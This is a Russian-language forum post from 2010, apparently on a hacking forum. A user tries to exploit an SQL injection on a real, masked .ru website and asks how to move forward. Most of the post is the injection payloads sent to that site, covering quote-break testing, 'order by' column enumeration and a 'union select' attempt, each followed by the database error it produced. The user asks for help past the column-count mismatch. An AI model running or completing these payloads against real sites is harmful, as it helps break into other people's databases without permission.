30.01.2010, 21:36
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
немогу с одной уязвимостью разобратся..
http://****.ru/?лала=11940238')
Выводит ошыбку>
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1
Делаю>
http://****.ru/?лала=119402381+order+by+1/*
Все идет
Когда делаю вот так>
http://****.ru/?лала=-119402381+order+by+2--
то выходит белый экран
а так>
http://****.ru/?лала=-119402381+order+by+3--
Query failed: Unknown column '3' in 'order clause'
Пробовал разные методы с UNION SELECT и нечего не найду, делаю такой запрос
http://****.ru/?лала=119402381+AND+1=1+union+select+1,2/*
и все время выходит
Query failed: The used SELECT statements have a different number of columns
Подскажите пожалуйста что делать...
я знаю что там
DB Server:MySQL >=5
Последний раз редактировалось [Feldmarschall]; 30.01.2010 в 22:42..
|
|
|